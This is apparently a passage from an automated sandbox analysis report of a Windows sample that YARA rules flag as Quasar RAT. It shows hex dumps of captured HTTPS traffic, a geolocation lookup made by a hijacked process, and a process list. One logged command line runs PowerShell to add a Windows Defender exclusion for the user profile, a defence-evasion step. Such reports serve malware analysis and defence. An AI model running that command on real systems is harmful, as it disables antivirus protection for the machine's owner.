2024-04-23 21:02:22 UTC	16384	IN	Data Raw: 72 29 2a 74 5b 31 5d 29 2c 30 3c 3d 6e 26 26 30 3c 3d 74 5b 31 5d 26 26 6e 3e 74 5b 31 5d 26 26 28 6e 3d 74 5b 31 5d 29 2c 74 2e 70 75 73 68 28 6e 29 2c 42 5b 65 5d 3d 74 29 7d 29 7d 2c 6c 2e 66 6c 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 21 30 29 2c 55 7c 7c 28 6e 3d 6e 7c 7c 31 2c 65 3f 6e 75 6c 6c 3d 3d 4c 3f 28 63 28 29 2c 6d 28 31 2c 30 2c 6e 29 2c 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 61 28 31 2c 30 2c 74 29 2c 76 28 29 2c 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 44 2e 69 73 43 6f 6d 70 6c 65 74 65 6c 79 49 64 6c 65 28 29 3f 65 28 29 3a 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 6e 28 65 Data Ascii: r)*t[1]),0<=n&&0<=t[1]&&n>t[1]&&(n=t[1]),t.push(n),B[e]=t)})},l.flush=function(e,t,n){void 0===e&&(e=!0),U\|\|(n=n\|\|1,e?null==L?(c(),m(1,0,n),L=s(function(){L=null,function r(e,t){a(1,0,t),v(),function n(e){D.isCompletelyIdle()?e():L=s(function(){L=null,n(e
2024-04-23 21:02:22 UTC	16384	IN	Data Raw: 28 73 70 2c 61 70 3d 43 74 29 2c 73 70 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 63 70 3d 73 70 3b 66 75 6e 63 74 69 6f 6e 20 75 70 28 74 29 7b 76 61 72 20 6e 3d 70 6f 28 29 2c 72 3d 74 61 28 29 3b 72 65 28 75 70 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 67 65 74 54 72 61 63 65 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 26 26 74 2e 67 65 74 54 72 61 63 65 43 74 78 26 26 74 2e 67 65 74 54 72 61 63 65 43 74 78 28 29 2e 67 65 74 54 72 61 63 65 49 64 28 29 7c 7c 72 7d 2c 65 2e 67 65 74 4c 61 73 74 50 61 67 65 56 69 65 77 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 29 7d 75 70 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 6c 70 3d 75 70 2c 66 70 3d 22 64 75 72 61 74 69 6f 6e 22 2c 64 70 3d Data Ascii: (sp,ap=Ct),sp.__ieDyn=1;var cp=sp;function up(t){var n=po(),r=ta();re(up,this,function(e){e.getTraceId=function(){return t&&t.getTraceCtx&&t.getTraceCtx().getTraceId()\|\|r},e.getLastPageViewId=function(){return n}})}up.__ieDyn=1;var lp=up,fp="duration",dp=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49725	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:23 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y8N7c1Y4naP4LXT&MD=bDMVUy3y HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-23 21:02:23 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 0f65e648-d358-4ef4-97c3-49f17c81e480 MS-RequestId: 312964eb-9390-4ffc-9012-1b25cd8b2dfb MS-CV: IMGyJ6lrFECF7HN1.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 23 Apr 2024 21:02:22 GMT Connection: close Content-Length: 24490
2024-04-23 21:02:23 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-23 21:02:23 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49759	63.140.39.35	443	6204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:24 UTC	792	OUT	POST /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1 Host: target.microsoft.com Connection: keep-alive Content-Length: 1051 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://learn.microsoft.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: MSCC=NR; at_check=true; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908004
2024-04-23 21:02:24 UTC	1051	OUT	Data Raw: 7b 22 72 65 71 75 65 73 74 49 64 22 3a 22 35 64 62 35 66 62 33 34 30 39 32 66 34 36 64 31 39 39 61 32 35 34 37 65 61 38 62 62 66 64 65 35 22 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 75 73 65 72 41 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 63 6c 69 65 6e 74 48 69 6e 74 73 22 3a 7b 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 62 72 6f 77 73 65 72 55 41 57 69 74 68 4d 61 6a 6f 72 Data Ascii: {"requestId":"5db5fb34092f46d199a2547ea8bbfde5","context":{"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36","clientHints":{"mobile":false,"platform":"Windows","browserUAWithMajor
2024-04-23 21:02:24 UTC	845	IN	HTTP/1.1 200 OK date: Tue, 23 Apr 2024 21:02:24 GMT content-type: application/json;charset=UTF-8 vary: origin,access-control-request-method,access-control-request-headers,accept-encoding access-control-allow-origin: https://learn.microsoft.com access-control-allow-credentials: true x-request-id: 5956c3e0-8e04-4765-b6e7-bb733c5e9b5a timing-allow-origin: * accept-ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List referrer-policy: strict-origin-when-cross-origin server: jag strict-transport-security: max-age=31536000; includeSubDomains cache-control: no-cache, no-store, max-age=0, no-transform, private x-xss-protection: 1; mode=block x-content-type-options: nosniff connection: close transfer-encoding: chunked
2024-04-23 21:02:24 UTC	1064	IN	Data Raw: 34 32 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 30 30 2c 22 72 65 71 75 65 73 74 49 64 22 3a 22 35 64 62 35 66 62 33 34 30 39 32 66 34 36 64 31 39 39 61 32 35 34 37 65 61 38 62 62 66 64 65 35 22 2c 22 63 6c 69 65 6e 74 22 3a 22 6d 69 63 72 6f 73 6f 66 74 6d 73 63 6f 6d 70 6f 63 22 2c 22 69 64 22 3a 7b 22 74 6e 74 49 64 22 3a 22 66 61 35 63 32 33 31 61 61 66 38 35 34 38 65 31 39 64 37 38 64 33 64 35 35 66 38 61 34 39 61 35 2e 33 34 5f 30 22 7d 2c 22 65 64 67 65 48 6f 73 74 22 3a 22 6d 62 6f 78 65 64 67 65 33 34 2e 74 74 2e 6f 6d 74 72 64 63 2e 6e 65 74 22 2c 22 70 72 65 66 65 74 63 68 22 3a 7b 7d 2c 22 74 65 6c 65 6d 65 74 72 79 53 65 72 76 65 72 54 6f 6b 65 6e 22 3a 22 51 76 39 61 73 42 43 4a 49 34 4b 58 56 74 39 59 41 4d 38 75 47 55 34 4e 35 69 42 41 78 Data Ascii: 421{"status":200,"requestId":"5db5fb34092f46d199a2547ea8bbfde5","client":"microsoftmscompoc","id":{"tntId":"fa5c231aaf8548e19d78d3d55f8a49a5.34_0"},"edgeHost":"mboxedge34.tt.omtrdc.net","prefetch":{},"telemetryServerToken":"Qv9asBCJI4KXVt9YAM8uGU4N5iBAx
2024-04-23 21:02:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49774	63.140.39.82	443	6204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:25 UTC	584	OUT	GET /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1 Host: target.microsoft.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: MSCC=NR; at_check=true; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908005\|PC#fa5c231aaf8548e19d78d3d55f8a49a5.34_0#1748086145
2024-04-23 21:02:26 UTC	450	IN	HTTP/1.1 405 Method Not Allowed date: Tue, 23 Apr 2024 21:02:26 GMT content-type: application/json;charset=UTF-8 vary: accept-encoding referrer-policy: strict-origin-when-cross-origin server: jag strict-transport-security: max-age=31536000; includeSubDomains cache-control: no-cache, no-store, max-age=0, no-transform, private x-xss-protection: 1; mode=block x-content-type-options: nosniff connection: close transfer-encoding: chunked
2024-04-23 21:02:26 UTC	67	IN	Data Raw: 33 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 52 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 27 47 45 54 27 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 7d 0d 0a Data Ascii: 3d{"status":405,"message":"Request method 'GET' not supported"}
2024-04-23 21:02:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49780	63.140.39.35	443	6204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:28 UTC	1005	OUT	POST /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1 Host: target.microsoft.com Connection: keep-alive Content-Length: 1133 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://learn.microsoft.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: MSCC=NR; at_check=true; MUID=0D19E9F3C251654A0877FD99C65163F5; MC1=GUID=80693ed0956b4d3bbf5854ef5432e609&HASH=8069&LV=202404&V=4&LU=1713906147888; MS0=05ae0c6c5ce74d35a7fe10439902c322; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908008\|PC#fa5c231aaf8548e19d78d3d55f8a49a5.34_0#1748086145
2024-04-23 21:02:28 UTC	1133	OUT	Data Raw: 7b 22 72 65 71 75 65 73 74 49 64 22 3a 22 39 63 62 36 39 36 39 63 65 33 36 31 34 33 38 61 61 65 63 36 39 61 61 39 33 35 63 35 33 36 66 34 22 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 75 73 65 72 41 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 63 6c 69 65 6e 74 48 69 6e 74 73 22 3a 7b 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 62 72 6f 77 73 65 72 55 41 57 69 74 68 4d 61 6a 6f 72 Data Ascii: {"requestId":"9cb6969ce361438aaec69aa935c536f4","context":{"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36","clientHints":{"mobile":false,"platform":"Windows","browserUAWithMajor
2024-04-23 21:02:28 UTC	845	IN	HTTP/1.1 200 OK date: Tue, 23 Apr 2024 21:02:28 GMT content-type: application/json;charset=UTF-8 vary: origin,access-control-request-method,access-control-request-headers,accept-encoding access-control-allow-origin: https://learn.microsoft.com access-control-allow-credentials: true x-request-id: 8a44acd8-d13d-4171-b909-506b27fa80d1 timing-allow-origin: * accept-ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List referrer-policy: strict-origin-when-cross-origin server: jag strict-transport-security: max-age=31536000; includeSubDomains cache-control: no-cache, no-store, max-age=0, no-transform, private x-xss-protection: 1; mode=block x-content-type-options: nosniff connection: close transfer-encoding: chunked
2024-04-23 21:02:28 UTC	1034	IN	Data Raw: 34 30 33 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 30 30 2c 22 72 65 71 75 65 73 74 49 64 22 3a 22 39 63 62 36 39 36 39 63 65 33 36 31 34 33 38 61 61 65 63 36 39 61 61 39 33 35 63 35 33 36 66 34 22 2c 22 63 6c 69 65 6e 74 22 3a 22 6d 69 63 72 6f 73 6f 66 74 6d 73 63 6f 6d 70 6f 63 22 2c 22 69 64 22 3a 7b 22 74 6e 74 49 64 22 3a 22 66 61 35 63 32 33 31 61 61 66 38 35 34 38 65 31 39 64 37 38 64 33 64 35 35 66 38 61 34 39 61 35 2e 33 34 5f 30 22 7d 2c 22 65 64 67 65 48 6f 73 74 22 3a 22 6d 62 6f 78 65 64 67 65 33 34 2e 74 74 2e 6f 6d 74 72 64 63 2e 6e 65 74 22 2c 22 70 72 65 66 65 74 63 68 22 3a 7b 7d 2c 22 74 65 6c 65 6d 65 74 72 79 53 65 72 76 65 72 54 6f 6b 65 6e 22 3a 22 79 74 53 5a 6f 36 33 63 33 32 4c 54 57 55 33 4f 61 67 73 4e 6d 2b 43 58 4a 70 41 78 6a Data Ascii: 403{"status":200,"requestId":"9cb6969ce361438aaec69aa935c536f4","client":"microsoftmscompoc","id":{"tntId":"fa5c231aaf8548e19d78d3d55f8a49a5.34_0"},"edgeHost":"mboxedge34.tt.omtrdc.net","prefetch":{},"telemetryServerToken":"ytSZo63c32LTWU3OagsNm+CXJpAxj
2024-04-23 21:02:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49784	63.140.39.82	443	6204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:28 UTC	745	OUT	GET /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1 Host: target.microsoft.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: MSCC=NR; at_check=true; MUID=0D19E9F3C251654A0877FD99C65163F5; MC1=GUID=80693ed0956b4d3bbf5854ef5432e609&HASH=8069&LV=202404&V=4&LU=1713906147888; MS0=05ae0c6c5ce74d35a7fe10439902c322; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908009\|PC#fa5c231aaf8548e19d78d3d55f8a49a5.34_0#1748086149
2024-04-23 21:02:29 UTC	450	IN	HTTP/1.1 405 Method Not Allowed date: Tue, 23 Apr 2024 21:02:29 GMT content-type: application/json;charset=UTF-8 vary: accept-encoding referrer-policy: strict-origin-when-cross-origin server: jag strict-transport-security: max-age=31536000; includeSubDomains cache-control: no-cache, no-store, max-age=0, no-transform, private x-xss-protection: 1; mode=block x-content-type-options: nosniff connection: close transfer-encoding: chunked
2024-04-23 21:02:29 UTC	67	IN	Data Raw: 33 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 52 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 27 47 45 54 27 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 7d 0d 0a Data Ascii: 3d{"status":405,"message":"Request method 'GET' not supported"}
2024-04-23 21:02:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49804	15.204.213.5	443	7372	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:02:39 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-04-23 21:02:39 UTC	223	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 21:02:39 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-04-23 21:02:39 UTC	1022	IN	Data Raw: 33 66 32 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 39 2e 31 38 37 2e 31 37 31 2e 31 33 32 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 Data Ascii: 3f2{ "About Us": "https:\/\/ipwhois.io", "ip": "89.187.171.132", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "Geor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49824	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-04-23 21:03:01 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y8N7c1Y4naP4LXT&MD=bDMVUy3y HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-23 21:03:01 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 9dcd923b-ad87-4115-896e-2f9f5ac6960e MS-RequestId: 86a97776-23af-4e2b-80e4-7dc5d8ed8513 MS-CV: cbho4/+PmEaHIawx.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 23 Apr 2024 21:03:00 GMT Connection: close Content-Length: 25457
2024-04-23 21:03:01 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-23 21:03:01 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	23:02:03
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\KxgGGaiW3E.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KxgGGaiW3E.exe"
Imagebase:	0x7ff7f30c0000
File size:	6'679'218 bytes
MD5 hash:	EB0BEAFCB365CD20EB00FF9E19B73232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:02:03
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:02:09
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
